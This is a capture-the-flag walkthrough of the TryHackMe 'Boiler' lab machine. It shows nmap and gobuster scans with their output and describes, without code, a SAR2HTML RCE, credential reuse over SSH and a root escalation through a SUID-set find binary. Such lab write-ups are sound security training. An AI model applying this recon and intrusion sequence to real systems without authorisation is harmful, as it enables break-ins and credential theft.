Hi everyone!
I am back for another TryHackMe Walkthrough.
Our CTF this time is Boiler, a medium difficulty machine. We can get some clues for the content from its tags, so we do expect to deal with some FTP, SSH and Webmin stuff.
So, know that we are all fired up (or rather bolied xD), let’s jump into it.
Let’s start with some enumeration, shall we?
So, here is my first attempt to enumerate the machine.
root@ip-10–10–22–172:~# nmap -sV -sC 10.10.73.89
Starting Nmap 7.60 ( https://nmap.org ) at 2020–12–19 11:51 GMT
Nmap scan report for ip-10–10–73–89.eu-west-1.compute.internal (10.10.73.89)
Host is up (0.0038s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.22.172
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 — secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn’t have a title (text/html; Charset=iso-8859–1).
MAC Address: 02:8D:36:E8:02:47 (Unknown)
Service Info: OS: UnixService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.97 seconds
First thing that caught my attention was the anonymous FTP.
“Sweet” I though, but it seems I was way too soon down the rabbit hole.
Let my explain myself.
As soon as I was connected to the FTP server, I came across the following .txt file.
Does this format ring any bells? After dealing with many of these guys on the Biohazard CTF, I instantly thought that this must be a ROT13 cipher. I was not mistaken after all, but the smile in face gone away the second I decoded it.
It seems that the creator is going to play some cat and mouse game with us. Ok, challenge accepted!
Back to the Nmap scan results, we have some Apache server running on port 80 and Webmin on port 10000. I quickly headed to Webmin port just to verify the existence of a login page. Maybe, we should search for some credentials, I guess.
But before that, let’s make a little more enumeration and crawl the server.
root@ip-10–10–22–172:~# gobuster dir -u http://10.10.73.89 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,tar
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.73.89
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,tar
[+] Timeout: 10s
===============================================================
2020/12/19 12:32:23 Starting gobuster
===============================================================
/manual (Status: 301)
/robots.txt (Status: 200)
/joomla (Status: 301)
Oh, a robots.txt! It seems that we might have a little something here.
It looks like we have a round of decimal and a round of base64, in order to reveal a hash that looks like a MD5.
However, it seems like we were tricked again!
Moving to the /joomla directory, I found yet another login page. Let’s crawl once more from that directory onwards. There were a lot of directories that popped up but the ones that I found a little out of ordinary were the followings.
I am not going to go through all of this, but I had some really hard time with the trolling of the creator. After a while, I landed to the /joomla/_test page, a SAR2HTML page. The first thing that came in my mind was to download the .tar file on the welcome page in case there is something of use and I’ve managed to find its version.
After a really quick search on the exploit-db, I found out that this specific version is vulnerable to a pretty easy RCE vulnerability.
Playing around a little bit with the RCE, I found the credentials for a SSH user. However, when I’ve tried it out it did not work.
With all those rabbit holes, I got myself troubled for quite a bit, but then I remembered that there was no SSH port on the Nmap scan performed previously. Could it be running on another port or once more this is a trick?
Let’s find out with a second Nmap scan.
root@ip-10–10–22–172:~# nmap -T4 -A -p- 10.10.73.89
Starting Nmap 7.60 ( https://nmap.org ) at 2020–12–19 13:28 GMT
Warning: 10.10.73.89 giving up on port because retransmission cap hit (6).
Nmap scan report for ip-10–10–73–89.eu-west-1.compute.internal (10.10.73.89)
Host is up (0.0012s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.22.172
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.3 — secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn’t have a title (text/html; Charset=iso-8859–1).
55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
| 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (EdDSA)
MAC Address: 02:8D:36:E8:02:47 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT ADDRESS
1 1.21 ms ip-10–10–73–89.eu-west-1.compute.internal (10.10.73.89)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1225.45 seconds
Bingo! There is a SSH service running on port 55007! This time we managed to login with the credentials found before and not a long time ago, we get our hands on a second’s user credentials through the backup.sh file.
As I could not find anything of interest, I switch on stoner user. There, we were welcomed with some more trolling, of course.
Let’s see if we are lucky enough to find some SUID bits misconfiguration. For those that want a more detailed description on the topic, there are some excellent resources here and here.
From the list above, we can see that there is a variety of things that we could try. After a while of searching on GTFOBins and some try and error, /usr/bin/find was the one that gave us the key to the root user.
Thoughts on the Boiler CTF
I can not describe how much I’ve enjoyed this one.
I really appreciated the creator’s effort to put some rabbit holes here and there, although they were a little bit annoying sometimes.
This is a good lesson to constantly remind ourselves that the key is to keep on enumerating up until we make it.
I highly recommend to check Boiler CTF yourselves, you will not be disappointed!
I hope you enjoyed this walkthrough!
Up until next time, stay safe and keep hacking! :)
